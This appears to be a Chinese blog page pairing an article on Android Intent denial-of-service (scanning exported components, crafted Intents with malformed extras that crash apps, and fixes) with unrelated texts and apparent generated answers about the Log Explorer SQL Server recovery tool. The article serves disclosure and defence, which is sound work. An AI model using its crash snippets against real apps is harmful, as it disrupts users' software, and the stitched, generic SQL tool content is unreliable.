log explorer for sql 不存在或访问被拒绝_是谁偷偷退出了我的应用?拒绝服务问题浅谈...

“……

我还是从前那个少年

没有一丝丝改变

时间只不过是考验

种在心中信念丝毫未减

……”

6a131bcdd7f98a7480058dacc0c43fa7.gif 在某个放晴的午后,我慵懒的走在京城街道,耳畔播放着好听的《少年》…… 一切仿佛是那么的美好 正当我怀念着那轻狂的少年时光时,耳边越来越明显的嘈杂声将我拉回了现实,这才发现耳边的音乐声早已停止了…… 9adad4a9ef5486b0996d6b39c3ac7dd3.gif 点亮手机,发现播放器已自动退出。忍不住道:“什么鬼,还带自己退出的”,顺手又点开,企图再次回到青春的时光…… 26400f23928901073b667d41c9aa7254.gif 然后,口吐芬芳:“这什么**应用,怎么又自动退出了……” 作为一名专业(自称)的移动安全从业人员,我意识到事情并不简单,于是立刻折返回家,熟练的打开电脑,插上数据线,adb shell 进入 dropbox 想查看异常文件。 fb9aba64c0a06d8bc71e301be4268d2b.png 这个时候仿佛听见系统跟我说:走开,我才不要给你看! b7c253ee9617cc79b1fa4160d61c43ac.gif 作为专业人士岂是这么容易被你吓到,我一定要找到是谁捣的鬼……

          问题复现          

遇到这种情况,我们可以通过开发常用的简单手段来进行问题复现:

首先这很明显是个拒绝服务攻击,那么我们要做的就是要先定位到发生了什么异常,这里以常规手段为例(当然厂商从业人员是可以通过系统层面的手段直接定位到问题):

1. 进入手机的开发者模式,开启USB调试

2. 通过adb logcat 命令开始记录手机的所有 Log

3. 打开刚刚使用的音乐播放器,静待问题复现

4. 通过问题时间及 exception 进行分析

So,Let's do it!

打开命令行,输入adb logcat -> test.log,待问题复现后停止 Log 采集,很快问题便来了,如下面截图所示:

5b289c82f3b02df9bd83cf867ea6e2cf.png 采集到的信息内,果然找到了如下 Log: e5de6950bda2670f3d425d8b2c76d059.png 可以看到此音乐软件的 进程是直接挂掉了 ,Caused by处(红色框)是这个问题的发起者,当然也就是攻击者,此时 已经完成了拒绝服务的攻击,并且已经开始影响到了用户的体验。 本着打破沙锅问到底的原则,我要研究下这块的攻击代码,等等,看着这熟悉的包名,这似曾相识的操作,这不是我前晚浏览 Android 常见漏洞时随手写的测试 APK 么…… 41bd09c665c480d36e14a1cff46c64b6.gif 我深深地陷入了的凝思中,开始 正视这类在2015年就被安全研究人员提出过的问题。 Android 组件间的通信有着多种方式,Intent 是最常见也是使用最广泛的一种,应用会通过getIntent(),getAction(),Intent.getXXXExtra() 的方式去获取数据,而如果获取到的是空数据、异常数据或者畸形数据,就会引发应用的崩溃,导致应用出现闪退等拒绝服务现象。 拒绝服务攻击 不仅可以导致安全防护等应用的防护功能被绕过(如杀毒应用,安全应用,防盗锁屏等),而且也有可能被竞争对手利用,使得自己的应用崩溃,可能在某种程度上造成损失。 拒绝服务影响范围:Android 全版本!!!

          攻击实践          

纸上得来终觉浅,绝知此事要躬行,来实践下吧!

带着这个问题查阅了网上的数据和相关资料,所以一起来实践看下这类问题是否依旧是大面积存在。

首先我们创建一个 Android 的工程,利用 PackageManager 可读出全部应用列表

pm.getInstalledApplications(PackageManager.GET_UNINSTALLED_PACKAGES);

通过如下代码可取得应用的暴露组件

   public void getExportedComponent(){

       PackageManager pm=getPackageManager();

       int exportedCount=0;  // 记录有暴露组件数量

       try {

           PackageInfo packageInfo=pm.getPackageInfo(packagename,PackageManager.GET_ACTIVITIES);

           // Activity

           ActivityInfo[] activityInfo=packageInfo.activities;

           try{

for (ActivityInfo activity:activityInfo){

               if(activity.exported){ // 判断是否暴露

                   Log.d("Exported",activity.name);

                   exportedCount++;

                   try{componentlist.add(activity.name);}catch (Exception e){

                       e.printStackTrace();

                   }

               }else{

                   Log.d("Not",activity.name);

               }

           }}catch (Exception e){

               e.printStackTrace();

           }

           // Seivice

           ServiceInfo[] serviceInfos=pm.getPackageInfo(packagename,PackageManager.GET_SERVICES).services;

           try{

for (ServiceInfo serviceInfo:serviceInfos){

               if (serviceInfo.exported){

                   exportedCount++;

                   Log.d("Exported",serviceInfo.name);

                   try{

componentlist.add(serviceInfo.name);}catch (Exception e){

                       e.printStackTrace();

                   }

               }else {

                   Log.d("Not",serviceInfo.name);

               }

           }}catch (Exception e){

               e.printStackTrace();

           }

           // Receiver

           ActivityInfo[] receivers = pm.getPackageInfo(packagename, PackageManager.GET_RECEIVERS).receivers;

           try{

for (ActivityInfo receiver:receivers){

               if (receiver.exported){

                   exportedCount++;

                   Log.d("Exported",receiver.name);

                   try{

                       componentlist.add(receiver.name);}catch (Exception e){

                       e.printStackTrace();

                   }

               }else {

                   Log.d("Not",receiver.name);

               }

           }}catch (Exception e){

               e.printStackTrace();

           }

       } catch (PackageManager.NameNotFoundException e) {

       }

       if(exportedCount!=0)

       {

           Toast.makeText(FuzzerActivity.this, "该应用共有"+exportedCount+"个暴露组件", Toast.LENGTH_SHORT).show();

       }

       else

       {

           Toast.makeText(FuzzerActivity.this, "该应用没有暴露组件", Toast.LENGTH_SHORT).show();

       }

   }

为了方便起见我们将其放入一个列表里,得到如下APK:

afff57e337e848ed7c85ac1199aba21f.png 超级厚码5bbd86bf9dc28fd19aa66d8ece11b3f8.png 想要知道自己动手试试吧 如上文中的某音乐APP是存在大概40余暴露组件,众所周知暴露组件的增多会增加攻击面,从而存在更大的安全风险。 6380e0ba14ad816568f19326019a038f.png 根据资料及对 Intent 源码分析,目前已知可能会引起该问题的攻击代码及原因如下示例: 5d16e602eedc1e2f891fd44d9f3e8ca3.gif

NullPointerException

问题代码示例:

  Intent i = new Intent();

  if (i.getAction().equals("XXXX")) {

     Log.d("TAG", "Test for Android Refuse Service");

  }

攻击思路:

  // adb

  adb shell am start -n 包名/.MainActivity

  // 亦可通过 Intent 直接启动此类组件  

5d16e602eedc1e2f891fd44d9f3e8ca3.gif

ClassCastException

问题代码示例:

  Intent intent = getIntent();

  String test = (String)intent .getSerializableExtra("key");

攻击代码示例:

  Intent intent = new Intent();

  intent.setClassName("目标 Activity ", "目标组件");

  intent.putExtra("key", BigInteger.valueOf(1));

  startActivity(i)

5d16e602eedc1e2f891fd44d9f3e8ca3.gif

IndexOutOfBoundsException

问题代码示例:

  Intent intent = getIntent();

  intArray = intent.getIntegerArrayListExtra("testarray");

  if (intArray != null) {

     for (int i = 0; i < 5; i++) {

         intArray.get(i);

    }

  }

攻击思路:

伪造 testarray 且小于其判断大小,通过 intent 传入,引起拒绝服务。

5d16e602eedc1e2f891fd44d9f3e8ca3.gif

ClassNotFoundException

问题代码示例:

  Intent intent = getIntent();

  intent.getSerializableExtra("key");

攻击代码示例:

  public void onCreate(Bundle savedInstanceState) {

      super.onCreate(savedInstanceState);

      setContentView(R.layout.main);

      Intent intent = new Intent();

      intent.setClassName("目标包名", "目标组件");

      intent.putExtra("key", new SerializableTest());

      startActivity(i);

  }

  // 自定义序列化内容

  public class SerializableTest implements Serializable{

      private static final long serialVersionUID = 42L;

      public SerializableTest(){

          super();

      }

  }

攻击思路:

自定义序列内容,通过 Intent 发送至目标组件,从而引起其拒绝服务问题。

经过上面的介绍,我们攻击代码的思路已经很清晰了,先扫描各应用暴露组件,进而分别用我们的 APK 去伪造 Intent 启动目标组件,同步使用 Logcat 或直接观察应用状态查看结果。

5d16e602eedc1e2f891fd44d9f3e8ca3.gif

因为只是验证问题,所以这里并未进行自启动且自动扫描,而是采用了手动扫描的形式,也更方便实时查看结果。

f90143944b63f9b10961aadef083e15c.png

鉴于此问题目前市场较多的应用仍存在,故此次还是不做数据统计结果的分享,有兴趣的也还请自行验证。

目前,此问题广泛的存在于各类应用中,除上文中的某知名音乐软件,在其他某些知名社交类应用、直播类应用、甚至部分安全类应用也存在。

        修复建议       

既然问题这么多了,还是修复一下吧,以下是经过实践得出的有效修复方式

1. 如非必要,直接将组件设定为不可导出

即:android:exported="false"

2. 暴露组件在被启动时一定进行参数的有效性验证并进行异常捕获

尤其Intent.getXXXExtra()相关代码

6117c9367f9ae9bd9884af32b6be6a1c.gif

建议捕获异常类型

· 空指针异常

· 类型转换异常

· 数组越界访问异常

· 类未定义异常

· 其他异常

       问题拓展       

Intent 是 Android 中很重要的一个通信方式,通常是会包含很多额外的数据,如 Action、 Extras等,以供目标组件处理。

2bb93d89aa4235bb54b36e73ca468444.pngIntent 安全一直以来也是移动安全领域的热点之一,因为外部输入的不确定性,从而可能会有更多被攻击的可能性

46e2157db178710da8b0c3a971737829.png

本地 Intent 注入的风险也更不仅是拒绝服务,如权限提升、LauchAnyWhere、间接访问私有组件等,尤其当 system 权限的 APP 存在漏洞时,就有可能会被绕过 IPC 权限。

远程的 Intent 注入,操作空间也会更加灵活,如来自网页的 JS 脚本可以通过远程的 Intent 实现拨打电话,通过网络短信中的链接,可以直接启动本地的应用等等。

抛出此类问题也是从安全角度提出一些 Intent 的使用方式,如在传递敏感信息时应优先考虑如何进行身份校验,而不是实现了功能,却给攻击者留下了漏洞。

写在最后

其实本文所谈的问题早在5年前就已经抛出来了,直到现在,市场上还有很多的未修复应用,还不乏一些大厂应用。可想而知,如何避免重复出现已发现的安全问题,还是任重而道远呀……

更多精彩阅读 6e676ec9c20b1f49c2ee239cfe82ccfd.gif“家贼难防”系列-密钥硬编码你需要知道的SELinux入门学习如何通过配置文件实现HTTPS证书固定

END

1bab76e75436bcb65139bd96a1fe1e2f.png

长按关注  最新动态

080eaa14fa44dc2760aa2e78986da5b2.gif
129a67adc2cf374ef346bb75b853fbe4.gif 好文!在看吗?点一下鸭!
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
介绍 Log Explorer主要用于对MSSQLServer的事物分析和数据恢复。你可以浏览日志、导出数据、恢复被修改或者删除的数据(包括执行过update,delete,drop和truncate语句的表格)。一旦由于系统故障或者人为因素导致数据丢失,它能够提供在线快速的数据恢复,最大程度上保证恢复期间的其他事物不间断执行。 他可以支持SQLServer7.0和SQLServer2000,提取标准数据库的日志文件或者备份文件中的信息。 其中提供两个强大的工具:日志分析浏览,对象恢复。具体功能如下: l 日志文件浏览 l 数据库变更审查 l 计划和授权变更审查 l 将日志记录导出到文件或者数据库表 l 实时监控数据库事物 l 计算并统计负荷 l 通过有选择性的取消或者重做事物来恢复数据 l 恢复被截断或者删除表中的数据 l 运行SQL脚本 产品 LogExplore包含两部分 l 客户端软件 l 服务器代理 服务器端代理是保存在SQLServer主机中的一个只读存储过程,他的作用是接受客户端请求,读取在线事物日志块并通过网络传给客户端软件,由客户端软件来读取这些原始的数据块来完成Log Explore所提供的所有功能。 他依赖来的网络协议包括: l Named Pipe:局域网中适用 l Tcp/Ip:广域网中适用 数据库相关介绍 事物日志(Transaction LogSQLServer的每个数据库都包含事物日志,它以文件的形式存储,可以记录数据库的任何变化。发生故障时SQLServer就是通过它来保证数据的完整性。 操作(Operation) 操作是数据库中定义的"原子行为",每个操作都在日志文件中保存为一条记录。它可以是用户直接输入的SQL语句,比如标准的insert命令,日志文件中便会记录一条操作代码来标志这个insert操作。 事物(Transaction) 事物是一系列操作组成的序列。他可以理解为直观的不可分割的一笔业务,可以执行成功或者失败。典型的事物比如由应用程序发出的具有开启-提交功能的一组SQL语句。不同的事物靠事物Id号(transaction ID)来区分,具有相同ID的事物记录的日志也相同。 在线事物日志(Online Transaction Log) 在线事物日志是指当前活动数据库所用的日志。可以通过如下命令来确定其对应文件 Select * from SYSFILES 他的文件后缀名一般是.LDF 离线事物日志(Offline Transaction Log) 离线事物日志是指非活动数据库所用的日志。当其数据库处于关闭(ShutDown)才状态下可以进行复制备份操作。他的结果同在线事物日志完全相同。 备份文件 备份文件是保存食物日志备份的文件,通常管理员通过运行SQL语句或者企业管理器来生成该文件。备份文件的内部结构和事物日志不同,他采用称为MTF的格式来保存数据。一个备份文件可以包含一个日志的多组备份,甚至包括多个数据库的混合备份. 设置为自动收缩 企业管理器--服务器--右键数据库--属性--选项--选择"自动收缩" 强烈要求该项不要选中.否则SQLServer将已循环的方式来覆盖先前的日志记录,将会导致LogExplore无法恢复错误. 数据恢复介绍 LogExplore允许你恢复应为误操作或者程序错误而导致的数据丢失或者更改.比如执行update\Delete语句时丢失了where子句,或者错误使用了Dts功能. LogExplore不支持直接修改数据库.他可以生成事物的逆操作脚本. 如果log是delete table where ...的话,生成的文件代码就是insert table .... 你可以通过SQL查询分析器,或者LogExplore的Run SQL Script功能来执行生成脚本. 关于Undo Undo功能可以逆操作一组指定的用户事物。包括insert,delete和update,其局限性如下: l 事物类别:LogExplore只能undo用户事物。用户事物是指在用户表上定义的事物,不支持系统表的更新恢复。同时,他也不支持计划变更的回滚。 l Blob类型:包括text,ntext,image类型。LogExplore只支持这些类型的insert和delete恢复,不支持update语句恢复。 关于redo Redo功能可以再次运行一组指定事物。它可以在以下情况中用到: 丢失数据库而且没有任何备份文件。 l 如果原始日志文件没有丢失可以通过Redo来实现恢复。 l 通过完整备份文件来把数据库恢复到某指定时间点,再通过redo功能完整恢
LogExplorer4.2_SqlServer数据库恢复工具 非常有用的工具,需要的拿去~ 使用Log Explorer查看和恢复数据 使用方法: 打开Log Explorer -> Attach Log File -> 选择SQL Server服务器和登陆方式 -> Connect -> 在Database Name中选择数据库 -> Attach-> 左面对话框中Browse-> View Log-> 就可以看到log记录了 想恢复的话: 右键Log记录 Undo Transation-> 选择保存文件名和路径-> 然后打开该文件到查询分析器里执行 T-sql代码就可以了 例如 如果Log是delete table where ...的话,生成的文件代码就是insert table .... 然后将此insert table的代码放到查询分析器里执行.就可以恢复数据. ---------------------------------------------------------------------- --如何恢复被delete/update的数据 ---------------------------------------------------------------------- 1 连接到被删除数据库的Db 打开log explorer 选择 "file"->"attach log file"->选择服务器和登陆方式->"connect"->选择"数据库"->"attach" 2 查看日志 在左面操作项目的对话框中选择"browse"项目->"view log"->就可以看到当前的Log记录了 3 恢复数据 右键某一条log记录,选择"undo transation"->"选择保存文件名和路径"->然后打开该文件到查询分析器里执行 T-sql代码就可以了 例如: 如果log是delete table where ...的话,生成的文件代码就是insert table .... ---------------------------------------------------------------------- --Log Explorer恢复被drop table和truncate table后的数据 ---------------------------------------------------------------------- 1 连接到被删除数据库的Db 操作同上 2 恢复方法 1) 选择"salvaage dropped/truncate"菜单,在右边的对话框中选择表名,和droped/trucated的日期, File Name中选择生成insert语句脚步的存放位置,condition选择是droped还是truncated, 最后点击"create" 就会生成insert语句,把生成的语句到查询分析器里面执行一下就可以了 2) 选择"ViewDDL Commands"菜单->选"truncate table" 操作项->点击"Salvage"->生成语句->查询分析器里执行 ---------------------------------------------------------------------- --log explorer使用的几个问题 ---------------------------------------------------------------------- 1) 对数据库做完全/差异/日志备份 备份时如果选用了删除事务日志中不活动的条目 再用Log explorer打试图看日志时,提示No log recorders found that match the filter,would you like to view unfiltered data 选择yes 就看不到刚才的记录了 如果不选用了删除事务日志中不活动的条目 再用Log explorer打试图看日志时,就能看到原来的日志并做恢复 2) 修改了其中一个表中的部分数据,此时用Log explorer看日志,可以作日志恢复 3) 然后恢复备份,(注意:恢复是断开log explorer与数据库的连接,或连接到其他数据上, 否则会出现数据库正在使用无法恢复) 恢复完后,再打开log explorer 提示No log recorders found that match the filter,would you like to view unfiltered data,选择yes 就看不到刚才在2中修改的日志记录,所以无法做恢复. 4) 不要用SQL的备份功能备份,搞不好你的日志就破坏了. 正确的备份方法是: 停止SQL服务,复制数据文件及日志文件进行文件备份. 然后启动SQL服务,用log explorer恢复数据
### 回答1: Log Explorer for SQL Server 2012 是一款用于探索 Microsoft SQL Server 数据库日志的工具,它可以帮助用户查看数据库日志信息,如数据库操作记录、错误信息和事务日志等。 Log Explorer for SQL Server 2012 具备强大的查询功能,支持通过数据库名称、表名、用户、时间范围等条件多种方式进行查询。此外,它还可以帮助用户识别和解决故障。如果数据库出现故障,Log Explorer for SQL Server 2012 可以帮助用户查找错误信息,以帮助他们快速地定位并修复问题。 使用 Log Explorer for SQL Server 2012 还有一个重要的好处,那就是可以帮助用户追踪数据库操作记录。有时用户需要了解谁在数据库中进行了哪些操作,并且也需要了解这些操作是否与数据库的性能有关。通过分析数据库日志信息,Log Explorer for SQL Server 2012 可以帮助用户了解数据库操作情况,从而更好地进行性能调优和优化。 总之,Log Explorer for SQL Server 2012 是一款功能强大、易于使用的工具,可以帮助 SQL Server 用户了解数据库日志信息,定位和解决问题,以及优化数据库性能。 ### 回答2: Log Explorer for SQL Server 2012是一款专业的SQL Server事务日志探索工具,它可以用来查看和分析SQL Server数据库的事务日志信息。该工具可以帮助用户更轻松地进行数据库管理、性能优化和故障排除工作。 使用Log Explorer for SQL Server 2012,用户可以实时获取SQL Server数据库中的事务日志信息,并进行实时监控;也可以查看历史的事务日志记录,以便进行故障分析。此外,该工具还支持自定义查询和过滤器,可以按需查找需要的事务日志信息。 此外,Log Explorer for SQL Server 2012还提供了简单易用的图形化界面,使得用户可以更直观的理解和分析事务日志信息。该工具还支持导出日志数据到 Excel 和 CSV 格式,便于用户进行进一步的数据分析和处理。 总之,Log Explorer for SQL Server 2012是一款功能强大的SQL Server事务日志探索工具,它可以帮助用户发现和解决问题,提高数据库管理和维护效率。 ### 回答3: Log Explorer for SQL Server 2012是一种SQL Server日志文件分析工具。它可帮助管理员深入了解和诊断SQL Server数据库的运行情况,快速定位数据库故障原因,并做出相应的修复措施。 Log Explorer for SQL Server 2012可以分析数据库的事务日志、错误日志和SQL Server代理日志等信息,以便管理员更好地了解数据库系统的工作情况。同时,它还提供了多种分析工具和功能,比如分析SQL Server的性能、分析数据库事务、推断日志备份策略和还原数据等功能,让管理员轻松地了解和管控数据库运行情况。 此外,Log Explorer for SQL Server 2012还提供了可视化的界面,方便管理员更好地了解和分析日志文件。它支持多种查询筛选条件、按时间、用户名和操作等多种方式排序和筛选日志,即便非专业人士也可以轻松地使用它来监控SQL Server数据库活动。 总而言之,Log Explorer for SQL Server 2012是一款非常便捷和实用的SQL Server日志文件分析工具,适用于SQL Server管理员和开发人员,可以提高他们对SQL Server数据库的管理和维护效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值